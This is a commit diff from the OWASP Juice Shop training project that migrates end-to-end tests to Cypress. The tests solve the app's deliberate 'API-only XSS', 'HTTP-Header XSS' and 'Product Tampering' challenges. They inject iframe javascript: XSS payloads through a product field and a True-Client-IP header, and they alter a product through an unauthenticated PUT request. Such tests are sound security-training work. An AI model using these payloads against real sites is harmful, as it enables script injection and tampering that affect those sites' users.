Merge pull request juice-shop#1877 from ShubhamPalriwala/cypress-excess

Migrate restApiSpec to Cypress (last migration) 🎉
vivekprm · Sep 8, 2022 · 2bf953f · 2bf953f
2 parents 1bffca1 + cbb5e98
commit 2bf953f
Show file tree

Hide file tree

Showing 4 changed files with 128 additions and 191 deletions.
diff --git a/cypress/integration/e2e/restApi.spec.ts b/cypress/integration/e2e/restApi.spec.ts
@@ -0,0 +1,117 @@
+describe("/api", () => {
+  describe('challenge "restfulXss"', () => {
+    beforeEach(() => {
+      cy.login({ email: "admin", password: "admin123" });
+    });
+
+    it("should be possible to create a new product when logged in", () => {
+      cy.task("disableOnContainerEnv").then((disableOnContainerEnv) => {
+        if (!disableOnContainerEnv) {
+          cy.window().then(async () => {
+            const response = await fetch(
+              `${Cypress.env("baseUrl")}/api/Products`,
+              {
+                method: "POST",
+                cache: "no-cache",
+                headers: {
+                  "Content-type": "application/json",
+                  Authorization: `Bearer ${localStorage.getItem("token")}`,
+                },
+                body: JSON.stringify({
+                  name: "RestXSS",
+                  description: '<iframe src="javascript:alert(`xss`)">',
+                  price: 47.11,
+                }),
+              }
+            );
+            if (response.status === 200) {
+              console.log("Success");
+            }
+          });
+
+          cy.visit("/#/search?q=RestXSS");
+          cy.reload();
+          cy.get('img[alt="RestXSS"]').click();
+
+          cy.on("window:alert", (t) => {
+            expect(t).to.equal("xss");
+          });
+
+          cy.expectChallengeSolved({ challenge: "API-only XSS" });
+        }
+      });
+    });
+  });
+
+  describe('challenge "changeProduct"', () => {
+    it("should be possible to change product via PUT request without being logged in", () => {
+      cy.task("GetTamperingProductId").then((tamperingProductId) => {
+        cy.task("GetOverwriteUrl").then((overwriteUrl) => {
+          cy.window().then(async () => {
+            const response = await fetch(
+              `${Cypress.env("baseUrl")}/api/Products/${tamperingProductId}`,
+              {
+                method: "PUT",
+                cache: "no-cache",
+                headers: {
+                  "Content-type": "application/json",
+                },
+                body: JSON.stringify({
+                  description: `<a href="${overwriteUrl}" target="_blank">More...</a>`,
+                }),
+              }
+            );
+            assert.equal(response.status, 200);
+          });
+
+          cy.visit("/#/search");
+        });
+      });
+      cy.expectChallengeSolved({ challenge: "Product Tampering" });
+    });
+  });
+});
+
+describe("/rest/saveLoginIp", () => {
+  describe('challenge "httpHeaderXss"', () => {
+    beforeEach(() => {
+      cy.login({
+        email: "admin",
+        password: "admin123",
+      });
+    });
+
+    it("should be possible to save log-in IP when logged in", () => {
+      cy.task("disableOnContainerEnv").then((disableOnContainerEnv) => {
+        if (!disableOnContainerEnv) {
+          cy.window().then(async () => {
+            const response = await fetch(
+              `${Cypress.env("baseUrl")}/rest/saveLoginIp`,
+              {
+                method: "GET",
+                cache: "no-cache",
+                headers: {
+                  Authorization: `Bearer ${localStorage.getItem("token")}`,
+                  "True-Client-IP": '<iframe src="javascript:alert(`xss`)">',
+                },
+              }
+            );
+            if (response.status === 200) {
+              console.log("Success");
+            }
+          });
+          cy.expectChallengeSolved({ challenge: "HTTP-Header XSS" }); // TODO Add missing check for alert presence
+        }
+      });
+    });
+  });
+
+  it("should not be possible to save log-in IP when not logged in", () => {
+    cy.request({ url: "/rest/saveLoginIp", failOnStatusCode: false }).then(
+      (response) => {
+        console.log(response.body);
+        expect(response.body).to.equal("Unauthorized");
+      }
+    );
+  });
+});
diff --git a/cypress/plugins/index.ts b/cypress/plugins/index.ts
@@ -59,11 +59,22 @@ export default (on, config) => {
     GetFromConfig(variable: string) {
       return Config.get(variable);
     },
+    GetOverwriteUrl() {
+      return Config.get("challenges.overwriteUrlForProductTamperingChallenge");
+    },
     GetPastebinLeakProduct() {
       return Config.get<Product[]>("products").filter(
         (product: Product) => product.keywordsForPastebinDataLeakChallenge
       )[0];
     },
+    GetTamperingProductId() {
+      const products: Product[] = Config.get("products");
+      for (let i = 0; i < products.length; i++) {
+        if (products[i].urlForProductTamperingChallenge) {
+          return i + 1;
+        }
+      }
+    },
     GenerateAuthenticator(inputString: string) {
       return otplib.authenticator.generate(inputString);
     },

diff --git a/test/e2e/e2eHelpers.ts b/test/e2e/e2eHelpers.ts
diff --git a/test/e2e/restApiSpec.ts b/test/e2e/restApiSpec.ts